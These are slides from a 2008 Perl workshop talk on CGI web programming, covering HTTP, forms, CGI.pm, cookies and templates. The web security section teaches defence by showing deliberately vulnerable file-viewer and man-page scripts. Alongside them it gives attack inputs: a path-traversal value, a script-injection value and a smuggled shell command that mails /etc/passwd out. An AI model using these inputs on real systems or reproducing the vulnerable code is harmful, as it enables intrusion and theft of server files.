Introduction to Web Programming with Perl
Dave Cross
Magnum Solutions
[email protected]
http://mag-sol.com
What We Will Cover
The HTTP Protocol
The CGI Protocol
Creating Dynamic Pages with Perl
Getting Input from Forms
The CGI Module
What We Will Cover
Basic Web Security
Using Cookies
Using Templates
Further Information
HTTP
Network Protocols
A protocol is a defined way for objects to interact
Requests and responses are clearly defined
Client makes a request
Server responds
HTTP
Hypertext Transfer Protocol
Client is (usually) a web browser
Server is a web server
Client makes a request for a URL
Server responds with appropriate data
HTTP Request
GET / HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc9 Firefox/3.0.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
HTTP Response
HTTP/1.x 200 OK
Date: Wed, 26 Nov 2008 20:42:54 GMT
Server: Apache/2.2.9 (Fedora)
Content-Length: 2172
Connection: close
Content-Type: text/html;charset=ISO-8859-1
...
Things to Note
Client requests a URL
Server works out what data is required
Response includes status code and data
Response defines type of data that follows
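The last two points can be seen by pulling a response apart. This is only a rough sketch: parse_response and the sample response text are invented for illustration, and real code would normally leave this work to an HTTP library such as LWP.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Split a raw HTTP response into status code, headers and body.
# parse_response is a hypothetical helper, not part of any module.
sub parse_response {
    my ($raw) = @_;
    # The headers end at the first blank line; the rest is the data.
    my ($head, $body) = split /\r?\n\r?\n/, $raw, 2;
    my ($status_line, @header_lines) = split /\r?\n/, $head;
    my ($code) = $status_line =~ m{^HTTP/\S+\s+(\d{3})};
    my %headers;
    for my $line (@header_lines) {
        my ($name, $value) = split /:\s*/, $line, 2;
        $headers{lc $name} = $value;
    }
    return ($code, \%headers, $body);
}

# Made-up sample response, shaped like the one shown earlier.
my $raw = join "\r\n",
    'HTTP/1.1 200 OK',
    'Content-Type: text/html;charset=ISO-8859-1',
    'Content-Length: 2172',
    '',
    '<html>...</html>';

my ($code, $headers, $body) = parse_response($raw);
print "Status: $code\n";
print "Type:   $headers->{'content-type'}\n";
```

The status code says whether the request worked; the Content-Type header tells the browser how to interpret the data that follows.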
URLs
Uniform Resource Locator
Defines a resource on the internet
http://example.com/some/path
Static URLs usually map on to a file on the web server
This mapping is defined by the web server
CGI
Beyond Static Pages
Static pages are limiting
Dynamic pages are more flexible
e.g. List of products
+ dynamic pages
= Online shop
CGI
Common Gateway Interface
Developed in 1993
Defines how
Data gets into a program
Output from the program is returned to the web server
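A minimal sketch of the "data gets into a program" side: the web server hands request details to the program in environment variables. REQUEST_METHOD, QUERY_STRING and CONTENT_LENGTH are standard CGI variables; env_report is a hypothetical helper written for this example.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Build a plain-text report of a few CGI environment variables.
# env_report is a made-up name used only in this sketch.
sub env_report {
    my @vars = qw(REQUEST_METHOD QUERY_STRING CONTENT_LENGTH);
    return join '', map {
        my $value = defined $ENV{$_} ? $ENV{$_} : '(not set)';
        "$_ = $value\n";
    } @vars;
}

# Whatever the program prints is returned to the web server.
print "Content-type: text/plain\n\n";
print env_report();
```

Run from the command line, every variable shows as "(not set)"; run by a web server as a CGI program, they are filled in for each request.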
Dynamic URLs
The web server needs to recognise CGI URLs
Two common methods
Location
e.g. cgi-bin directory
Naming
e.g. .cgi extension
cgi-bin
Commonly defined as a place to put CGI programs
All requests to this directory are CGI programs
ScriptAlias /cgi-bin/ "/var/www/cgi-bin/"
.cgi
Commonly defined as the extension for CGI programs
All requests to resources with this extension are CGI programs
Says nothing about programming language
AddHandler cgi-script .cgi
Running CGI Programs
Web server checks incoming requests
If it is a CGI request (location or extension)
Set up CGI environment
Call program
Return program output to browser
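The "location or extension" check could be sketched like this. It is not how any particular web server implements it; is_cgi_request is a hypothetical function, and it assumes the path has already had any query string removed.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Decide whether a URL path should be treated as a CGI program,
# using the two conventions described above.
sub is_cgi_request {
    my ($path) = @_;
    return 1 if $path =~ m{^/cgi-bin/};   # by location
    return 1 if $path =~ m{\.cgi$};       # by naming
    return 0;
}

for my $path ('/cgi-bin/hello', '/shop/list.cgi', '/index.html') {
    printf "%-16s %s\n", $path, is_cgi_request($path) ? 'CGI' : 'static';
}
```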
Perl and CGI
Perl and CGI
The early webmasters were also sysadmins
Most sysadmins used Perl a lot
Most CGI programs produce HTML
HTML is just a form of text
Perl is great for manipulating text
Many early CGI programs were written in Perl
Perl is Not CGI
Perl was used long before CGI programs were developed
Perl continues to be used in non-web areas
Other languages have also been used to write CGI programs
Some people still (incorrectly) assume that Perl and CGI are the same thing
Simple Perl CGI Program
#!/usr/bin/perl
print "Content-type: text/plain\n\n";
print "Hello world";
Simple Perl CGI Program
#!/usr/bin/perl
print "Content-type: text/html\n\n";
...
print "/images/$a_pic"
);
Handling Input
Handling Input
So far all of our examples have only produced output
CGI programs are far more flexible if they can accept input
HTML Forms
CGI programs get their input from HTML forms
Text input, radio buttons, checkboxes, selectors
All seem very similar when they get to your CGI program
Sample HTML Form
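<form action="...">
<p>Name: <input type="text" name="name" /></p>
<p><input type="radio" name="sex" value="Male" /> Male
<input type="radio" name="sex" value="Female" /> Female</p>
<p><input type="submit" /></p>
</form>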
Handling the Form
#!/usr/bin/perl
use CGI ':standard';
my $name = param('name');
my $sex = param('sex');
print header,
start_html(-title=>"Hello $name"),
h1("Hello $name"),
p("Hello $name, you are $sex"),
end_html;
CGI Parameters
The CGI module has a function called 'param'
Returns the value of the parameters passed to the program
Pass it the name of the parameter you are interested in
The name is the name of the HTML form input
Listing Parameters
Without an argument, 'param' returns a list of all parameter names
my @params = param;
foreach my $param (@params) {
print p('Param ', b($param), ' is ',
i(param($param)));
}
Multivalued Parameters
Sometimes one name is associated with multiple values
The 'param' function handles this too
Checkboxes
Checkboxes allow you to choose several linked options
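<p>Drinks:
<input type="checkbox" name="drink" value="beer" /> Beer
<input type="checkbox" name="drink" value="wine" /> Wine
<input type="checkbox" name="drink" value="coke" /> Coke</p>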
Three inputs with the same name
What will 'param' do?
Handling Checkboxes
Our previous form handler already copes with this
In scalar context, 'param' returns only the first value
$drinks = param('drink');
You can also get a list
@drinks = param('drink');
print join ', ', @drinks;
Perl calls this context
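A function can find out which context it was called in with the built-in wantarray. The sketch below uses a made-up function, pick_drinks, with a hard-coded list standing in for form data; returning the first value in scalar context is a choice made for this example.

```perl
#!/usr/bin/perl
use strict;
use warnings;

my @stored = qw(beer wine coke);

# pick_drinks is a hypothetical function. wantarray is true when
# the caller asked for a list and false when it asked for a scalar.
sub pick_drinks {
    return wantarray ? @stored : $stored[0];
}

my $one = pick_drinks();   # scalar context: a single value
my @all = pick_drinks();   # list context: every value

print "Scalar: $one\n";
print 'List:   ', join(', ', @all), "\n";
```

The same call gives different results depending only on what is on the left-hand side of the assignment.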
GET vs POST
HTML forms can send parameters to CGI programs in two ways
GET encodes the data in the URL
POST encodes the data in the request body
Define which method to use in the <form> element
Default value is GET
GET
The default method is GET
Can be omitted
Data in URL
http://localhost/cgi/handle_form2?name=Dave&sex=Male&drink=beer&drink=wine&drink=coke
Easy to debug
Easy to hack
POST
POST needs to be set explicitly
Data transmitted in HTTP request body
Not seen in URL
Harder to debug
Harder to hack
Handling GET and POST
CGI.pm hides the difference from you
Both GET and POST parameters are accessed in the same way
'param' handles both methods
Easy to swap between the two
Mishandling CGI Data
CGI.pm has been a standard part of Perl for over ten years
No reason not to use 'param'
Some people still don't
Old code
Or code based on old code
Broken CGI Parser
if ($ENV{'REQUEST_METHOD'} eq 'GET') {
@pairs = split(/&/, $ENV{'QUERY_STRING'});
} elsif ($ENV{'REQUEST_METHOD'} eq 'POST') {
read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
@pairs = split(/&/, $buffer);
}
foreach $pair (@pairs) {
my ($name, $val) = split /=/, $pair;
# some decoding skipped...
$form{$name} = $value;
}
You will see code like this
Do not use it
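One reason such hand-rolled parsers are fragile, sketched with an invented query string: storing one value per name silently loses repeated parameters such as checkboxes. This is an illustration of the failure, not a replacement for 'param'.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Made-up query string with one repeated parameter.
my $query = 'name=Dave&drink=beer&drink=wine&drink=coke';

my %naive;   # one slot per name: later values overwrite earlier ones
my %multi;   # an array per name: every value is kept

for my $pair (split /&/, $query) {
    my ($name, $value) = split /=/, $pair, 2;
    $naive{$name} = $value;
    push @{ $multi{$name} }, $value;
}

print "Naive: $naive{drink}\n";
print 'All:   ', join(', ', @{ $multi{drink} }), "\n";
```

Even the second version still ignores URL decoding and other details, which is why using a tested module is the safer route.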
Simple CGI Summary
Simple CGI Summary
CGI defines a way to create dynamic web pages
Web server identifies CGI URLs
By location or name
Web server sets up CGI environment
Calls CGI program
Output returned to browser
CGI Input
CGI input comes from HTML forms
Input is either GET or POST
CGI program sees a series of name/value pairs
Debugging CGI
Debugging CGI
Things will go wrong when writing CGI programs
Here are some suggestions on tracking down problems
Debugging Perl
Same techniques as debugging any Perl program
Help Perl to help you
use strict
Must declare variables
use warnings
Warn about potential problems
Use both of these in all Perl programs
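A small sketch of what "must declare variables" buys you. The snippet with the misspelled variable is invented for this example and is compiled with a string eval so the error can be captured rather than stopping the program.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# A snippet that declares $total but then misspells it as $totl.
my $snippet = 'use strict; my $total = 1; $totl = 2; 1;';

# Under strict the snippet fails to compile, so eval returns
# false and the compiler's message is left in $@.
my $ok    = eval $snippet;
my $error = $@;

print $ok ? "Compiled fine\n" : "strict says: $error";
```

Without "use strict" the typo would quietly create a new global variable and the bug would surface much later, if at all.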
Check Syntax
Use perl -c to check for syntax errors
#!/usr/bin/perl
Print "hello\n";
$ perl -c print
String found where operator expected at print line 3, near "Print "hello\n""
(Do you need to predeclare Print?)
syntax error at print line 3, near "Print "hello\n""
print had compilation errors.
Check Error Log
All web servers write an error log
Location depends on configuration
Generic error message to browser
Security feature
Real error message in error log
Anything written to STDERR goes to error log
Writing to Error Log
#!/usr/bin/perl
use CGI 'header';
print header(
-type => 'text/plain'
);
print 'Nothing went wrong!';
# warn writes to STDERR
warn '(Actually something did)';
Errors to Browser
Sometimes it's useful to see real errors in the browser
CGI::Carp does this
use CGI::Carp 'fatalsToBrowser';
Still a security hole
Remove once debugging is over
Or, at least, comment it out
Debugging HTTP
It's often useful to debug the HTTP exchange
See exactly what requests and responses are being exchanged
LWP (from CPAN) includes the GET, POST and HEAD programs
Debugging HTTP
#!/usr/bin/perl
use CGI 'header';
print header(
-type => 'text/plain',
-x_go_away => "It's a secret",
);
print 'See headers for more info';
Using HEAD
$ HEAD http://localhost/cgi/headers
200 OK
Connection: close
Date: Sat, 22 Nov 2008 14:59:15 GMT
Server: Apache/2.2.9 (Fedora)
Content-Type: text/plain; charset=ISO-8859-1
Client-Date: Sat, 22 Nov 2008 14:59:15 GMT
Client-Peer: 127.0.0.1:80
Client-Response-Num: 1
X-Go-Away: It's a secret
Live HTTP Headers
Live HTTP Headers is an add-on for Firefox
Allows you to watch the complete HTTP exchange
View
Save
Replay
Web Security
Web Security
Exposing a program on your web server is a brave thing to do
Anyone connected to the internet can run your program
Not everyone out there is nice
Need to be sure your program is secure
What Can Go Wrong?
You want a program to display files from your server
Accepts a file as a parameter
Send the contents of the file to the browser
Here's a first attempt
File Viewer Program
#!/usr/bin/perl
use CGI ':standard';
my $file = param('filename');
print header(-type => 'text/plain');
open FILE, $file
or die "Can't open $file: $!\n";
print while <FILE>;
What's Wrong With That?
You just compromised the security of your server
Your server contains many files that outsiders shouldn't see
e.g. /etc/passwd
Now anyone on the internet can see a list of usernames on your server
Forms Won't Save You
You could present a page that only allows people to choose certain files
People will look at the source of the form and hack the URL
You could change GET to POST to prevent URL-hacking
People will create their own form and use that to send hacked parameters
Another Attempt
#!/usr/bin/perl
use CGI ':standard';
my $dir = '/usr/files/';
my $file = $dir . param('filename');
print header(-type => 'text/plain');
open FILE, $file
or die "Can't open $file: $!\n";
print while <FILE>;
Another Attempt
We have forced files to exist in a certain directory
Only files in that directory can be viewed
That's not true
We can use '..' to move up a directory
filename=../../etc/passwd
Still insecure
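To see why the directory prefix does not help, this sketch works out where such a path really points. resolve is a hypothetical helper that only does string handling: it ignores symbolic links and never touches the filesystem.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Collapse '.' and '..' components the way the operating system
# would when following the path. resolve is a made-up helper.
sub resolve {
    my ($path) = @_;
    my @parts;
    for my $part (split m{/+}, $path) {
        next if $part eq '' or $part eq '.';
        if ($part eq '..') {
            pop @parts;          # move up one directory
        } else {
            push @parts, $part;
        }
    }
    return '/' . join('/', @parts);
}

my $dir = '/usr/files/';
print resolve($dir . 'notes.txt'), "\n";
print resolve($dir . '../../etc/passwd'), "\n";
```

The second path ends up outside /usr/files altogether, even though the string still starts with the "safe" directory.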
A Different Problem
We want to run a command on the server taking input from the user
For example, a manual page viewer
Takes a page name from user input
Manual Page Viewer
#!/usr/bin/perl
use CGI ':standard';
my $page = param('man');
print header(-type=>'text/plain');
print `man $page | col -b`;
What's Wrong With That?
Once again you've compromised security on your server
Problem is in this line
print `man $page | col -b`;
Passing user input to an external program
Dangerous input
ls; mail [email protected] < /etc/passwd
Another Problem
Accept user input and write a results page using it
We've done this before
What if the input includes Javascript?
name=Dave
name=Dave<script>alert("Gotcha")</script>
Javascript can be dangerous
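One common defence, sketched here under assumptions, is to escape HTML metacharacters before echoing input back to the browser. escape_html is a hypothetical helper written for this example; CGI.pm also provides an escapeHTML function for the same job.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Characters that are special in HTML and their entity forms.
my %entity = (
    '&' => '&amp;',
    '<' => '&lt;',
    '>' => '&gt;',
    '"' => '&quot;',
);

# escape_html is a made-up helper: it replaces each special
# character so the browser displays it instead of acting on it.
sub escape_html {
    my ($text) = @_;
    $text =~ s/([&<>"])/$entity{$1}/g;
    return $text;
}

print escape_html('Dave<script>alert("Gotcha")</script>'), "\n";
```

After escaping, the script tag is shown as text on the page rather than being run by the browser.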
Trust No-One
All of these problems have the same root cause
We trusted user input
Never trust your users
They are either malicious or stupid
Both options are dangerous to you
Check All Input
Check everything that comes into your program
Don't trust any piece of data
Especially if you're sending it out of your program
Use whitelists to define valid data
Throw out anything that doesn't match
Safe File Viewer
#!/usr/bin/perl
use CGI ':standard';
print header(-type => 'text/plain');
my $dir = '/usr/files/';
my $file = param('filename');
if ($file =~ /^(\w[\w\.]+)$/) {
$file = "$dir/$1";
} else {
print 'Go away!';
die "Bad filename: $file\n";
}
...
Is It Safe?
The safe file viewer assumes that all valid files are in one directory
Therefore the filename can only contain certain characters
/^(\w[\w\.]+)$/
Word characters and dots
No directory slashes
Anchors to match whole string
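The pattern can be tried against a few inputs. safe_filename is a hypothetical wrapper around the same regular expression, and the sample filenames are invented.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Return the filename if it passes the whitelist, undef otherwise.
sub safe_filename {
    my ($file) = @_;
    return $file =~ /^(\w[\w\.]+)$/ ? $1 : undef;
}

for my $input ('notes.txt', '../../etc/passwd', '.bashrc', 'a') {
    my $result = safe_filename($input);
    printf "%-18s %s\n", $input,
        defined $result ? "ok ($result)" : 'rejected';
}
```

Only notes.txt is accepted. The pattern needs a word character followed by at least one more character, so a one-letter name such as 'a' is rejected too; with a whitelist it is better to refuse a valid name than to let a bad one through.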
Safe Manual Viewer
#!/usr/bin/perl
use CGI ':standard';
my $page = param('man');
if ($page =~ /^(\w+)/) {
$page = $1;
} else {
die "Bad page name: $page\n";
}
print header(-type=>'text/plain');
print `man $page | col -b`;
Is It Safe?
Uses a similar approach to the safe file viewer
Unix commands consist of word characters
Use the word characters from the start of the input string
Ignore the rest
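A sketch of how "use the word characters, ignore the rest" treats hostile input. clean_page is a hypothetical helper and the inputs are made up; when nothing matches it returns undef, and the caller should refuse to run the command at all.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Keep only the leading word characters of the requested page.
sub clean_page {
    my ($page) = @_;
    return $page =~ /^(\w+)/ ? $1 : undef;
}

for my $input ('perl', 'ls; cat /etc/passwd', '; rm -rf /') {
    my $page = clean_page($input);
    printf "%-22s %s\n", $input,
        defined $page ? "man $page" : 'rejected';
}
```

The second input is cut down to a harmless "ls". The third has no leading word characters, so there is nothing safe to pass on.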
Safe HTML Input
#!/usr/bin/perl
use CGI ':standard';
my $name = param('name');
my $sex = param('sex');
$name =~ s/</&lt;/g;
...
Privacy -> Show cookies
You will probably have a lot of cookies
Sites use them to track visitors
Some people block them for that reason
Using Cookies
CGI.pm contains a cookie function
Used to both create and access cookies
Cookies need to be sent in the CGI header
Often the first thing you need to do
Setting a Cookie
my $time_cookie = cookie(
-name=>'time',
-value=>scalar localtime,
-expires=>'+1y'
);
print header(
-cookie => $time_cookie
);
print start_html(
-title=>'Cookie test'
);
print h1('Cookie test');
Getting a Cookie
if (my $time = cookie('time')) {
print p("You last visited this page at $time");
} else {
print p("You haven't visited this page before");
}
Cookie Confusion
People sometimes find cookie code confusing
There are often two completely separate cookies in a program
One incoming, one outgoing
The outgoing cookie is usually dealt with first
Because it needs to be in the header
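The two directions can be seen without CGI.pm. In this sketch the incoming cookie string is the kind of value a web server places in the HTTP_COOKIE environment variable, and the outgoing cookie is a Set-Cookie header line. Both helper functions and the sample values are invented, and the sketch assumes simple values that need no encoding.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Incoming: parse the cookie string sent by the browser.
sub incoming_cookies {
    my ($header) = @_;
    my %cookie;
    for my $pair (split /;\s*/, defined $header ? $header : '') {
        my ($name, $value) = split /=/, $pair, 2;
        $cookie{$name} = $value;
    }
    return \%cookie;
}

# Outgoing: build a header line to print with the other headers.
sub outgoing_cookie {
    my ($name, $value) = @_;
    return "Set-Cookie: $name=$value; path=/";
}

my $in = incoming_cookies('time=yesterday; theme=dark');
print "Last visit: $in->{time}\n";
print outgoing_cookie('time', 'today'), "\n";
```

The value read and the value written share a name but are separate things: one came from the previous visit, the other is stored for the next one.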
Login Example
Cookies can be used to track whether a user is logged in to a site
Write a cookie when the user logs in
Delete it when the user logs out
Actually just force it to expire
Log In With Cookies (1)
my $name;
my $logged;
if (param('login')) {
$logged = 1;
$name = param('name');
print header(
-cookie => cookie(
-name => 'name',
-value => $name,
-expires => '+1y',
)
);
}
Log In With Cookies (2)
elsif (param('logout')) {
$logged = 0;
$name = 'Guest';
print header(
-cookie => cookie(
-name=>'name',
-value=>'',
-expires=>'-1d',
)
);
}
Log In With Cookies (3)
else {
$logged = defined cookie('name');
$name = cookie('name') || 'Guest';
print header;
}
print start_html(-title => 'Cookies');
print h1('Cookies');
print p('This is a cookie test page');
$name =~ s/</&lt;/g;
...
-name => 'logout',
-value => 'logout'));
} else {
print p('Enter your name: ',
textfield(-name => 'name'),
submit(-name => 'login',
-value => 'Set name'));
print end_form;
}
print end_html;
Cookie Security
Secure web apps don't reveal any more data than is necessary
Don't trust the browser
Don't store identifiable data in a cookie
Use a nondescript name
Store the real data on your server
Store a reference to data in cookie
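A minimal sketch of "store the real data on your server, store a reference in the cookie". Everything here is an assumption made for illustration: the in-memory hash stands in for a database, the function names are invented, and rand is not a strong enough source of randomness for real session identifiers.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use Digest::SHA qw(sha256_hex);

# Stands in for a database or file store on the server.
my %session_store;

# Keep the data on the server and hand back an opaque identifier.
# NOTE: rand() is used only to keep the sketch short; real code
# needs a cryptographically strong random source.
sub create_session {
    my ($data) = @_;
    my $id = sha256_hex(join '|', time(), $$, rand(), rand());
    $session_store{$id} = $data;
    return $id;
}

# Look the data up again, rejecting anything that does not look
# like one of our identifiers.
sub load_session {
    my ($id) = @_;
    return unless defined $id && $id =~ /^[0-9a-f]{64}$/;
    return $session_store{$id};
}

my $id = create_session({ name => 'Dave' });
print "Cookie value: $id\n";
print 'Server-side name: ', load_session($id)->{name}, "\n";
```

The browser only ever sees the identifier, which reveals nothing about the user on its own.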
Templates
Templates
So far all of our HTML has been stored in the program
Either hard-coded HTML or CGI.pm functions
This is fine for demos or simple programs
Can cause problems with larger projects
Separating Concerns
It's a good idea to separate business logic from display logic
Code that works out what to display
Code that works out how to display it
Advantages
Easier to change look of site
Easier to have consistent look and feel
Easier to split work between designers and programmers
Easier to produce alternative views of data
Simple Templating
See perlfaq4
How can I expand variables in text strings?
Everyone writes a templating system
Most people release their templating system to CPAN
Please don't do that
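To show why everyone ends up writing one, here is roughly how small a home-made templating system can be. fill_template and its [% name %] placeholder syntax are made up for this sketch (the syntax is borrowed only for familiarity); it handles plain variable substitution and nothing else.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Replace each [% name %] placeholder with the matching value
# from a hash reference. Unknown names become an empty string.
sub fill_template {
    my ($template, $vars) = @_;
    $template =~ s/\[%\s*(\w+)\s*%\]/exists $vars->{$1} ? $vars->{$1} : ''/ge;
    return $template;
}

my $template = "Your name is [% name %]\nYour sex is [% sex %]\n";
print fill_template($template, { name => 'Dave', sex => 'Male' });
```

Loops, conditionals, escaping and included files are where the real work starts, which is the argument for picking an existing system instead.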
Templating Systems
Many templating systems on CPAN
Text::Template
HTML::Template
HTML::Mason
Template Toolkit
Many more
I choose the Template Toolkit
Template Toolkit
Flexible templating system
Equally useful in web and non-web applications
Simple templating language
Not Perl
Good Book Too
CGI Using Templates
Create an output template containing your HTML
CGI program acts largely as before
Processes inputs
Determines outputs
Passes outputs to template processor
Template Example
#!/usr/bin/perl
use CGI qw(param header);
use Template;
my $tt = Template->new;
my $name = param('name');
my $sex = param('sex');
my @drink = param('drink');
print header;
$tt->process('form.tt',
{ name => $name,
sex => $sex,
drink => \@drink })
or die $tt->error;
Template Example
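<html><head><title>Template Toolkit</title></head>
<body>
<h1>Template Toolkit</h1>
<p>Your name is [% name %]</p>
<p>Your sex is [% sex %]</p>
<p>You like to drink:</p>
<ul>
[% FOREACH d IN drink -%]<li>[% d %]</li>
[% END %]</ul>
</body></html>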
Simpler Templates
#!/usr/bin/perl
use CGI qw(param header);
use Template;
my $tt = Template->new;
print header;
$tt->process('form2.tt')
or die $tt->error;
Simpler Templates
[% USE CGI -%]
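<html><head><title>Template Toolkit</title></head>
<body>
<h1>Template Toolkit</h1>
<p>Your name is
[% CGI.param('name') %]</p>
<p>Your sex is
[% CGI.param('sex') %]</p>
<p>You like to drink:</p>
<ul>
[% FOREACH d IN CGI.param('drink') -%]<li>[% d %]</li>
[% END %]</ul>
</body></html>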
More Information
More Information
A really quick overview of web programming with Perl
Skimmed over a lot of detail
Some ideas for other things to investigate
Other sources of information
Things Missed Out
CGI.pm
Far more functionality than we have covered
CGI environment functions
Sticky fields
Multi-page forms
More complex HTML generation
See perldoc CGI
Alternatives to CGI
CGI can be slow
Perl starts up for every page visit
Doesn't scale well
Alternative approaches
mod_perl
Embeds a Perl interpreter in Apache
Much faster and more flexible
Storing Data
Most web applications will deal with a database
Storing and retrieving data
Standard Perl database interface
DBI
More advanced database interfaces
DBIx::Class
Web Frameworks
Web frameworks are very fashionable
Model (database)
View (templates)
Controller (logic)
MVC framework
e.g. Ruby on Rails
Perl Frameworks
Perl has MVC frameworks
Most popular is probably Catalyst
DBIx::Class + Template Toolkit
See Matt Trout's Tutorial after lunch
Sources of Information
Documentation for Perl modules at CPAN
http://search.cpan.org/
CGI.pm
http://search.cpan.org/dist/CGI.pm
Template Toolkit
http://search.cpan.org/dist/Template-Toolkit
http://tt2.org/
Books
CGI Programming with Perl
Guelich, Gundavaram, Birznieks
Writing CGI Applications with Perl
Meltzer, Michalski
Official Guide to Programming with CGI.pm
Stein
That's All Folks
Thank you for listening
Any questions?
I'll be around all day
Feel free to email [email protected]
London Perl Workshop
29th November 2008